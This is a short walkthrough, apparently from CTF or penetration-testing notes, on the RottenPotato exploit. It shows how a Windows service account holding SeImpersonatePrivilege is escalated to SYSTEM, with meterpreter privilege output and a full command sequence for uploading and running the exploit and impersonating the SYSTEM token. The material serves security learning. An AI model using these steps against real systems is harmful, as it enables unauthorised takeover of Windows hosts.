RottenPotato

The information on this page was extracted from this post:

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

Service accounts usually hold special privileges (SeImpersonatePrivilege, and often SeAssignPrimaryTokenPrivilege as well), and RottenPotato abuses them to escalate from the service account to SYSTEM.

I won’t go into the details on how this exploit works, the article above explains it far better than I ever could.

Let's check our privileges with meterpreter (outside a meterpreter session, whoami /priv shows the same list):

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

Excellent, it looks like we have the privileges we need to perform the attack. Let's upload rottenpotato.exe to the target.

Back in our meterpreter session, we load the incognito extension.

Listing the available tokens shows that we currently have no impersonation tokens. Let's run the RottenPotato exploit.

We need to impersonate the NT AUTHORITY\SYSTEM token quickly: it only exists for a short window and will disappear.

Success! We have our SYSTEM shell and can grab the root.txt file!
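The complete meterpreter command sequence behind the steps above, written out here as an added example rather than taken from the original post's screenshots. The local path of rottenpotato.exe and the target working directory are assumptions, the lines beginning with # are annotations and not console input, and the getuid line shows the expected result rather than captured output:

```console
meterpreter > getprivs
# SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege must appear in the list

meterpreter > upload /root/tools/rottenpotato.exe .
# Assumed local path; "." places the binary in the session's current directory on the target

meterpreter > load incognito

meterpreter > list_tokens -u
# Before the exploit runs, no NT AUTHORITY\SYSTEM impersonation token is listed

meterpreter > execute -H -c -f rottenpotato.exe
# -H hidden window, -c channelized I/O, -f the uploaded binary

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
# Issue this immediately after execute: the token is only available briefly

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

If impersonate_token reports that the token is not found, the window was missed: run execute and impersonate_token again back to back. Note also that this technique depends on the local DCOM/NTLM relay described in the linked post, which later Windows releases mitigated; the presence of SeImpersonatePrivilege alone does not guarantee that this particular binary succeeds on a current build.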
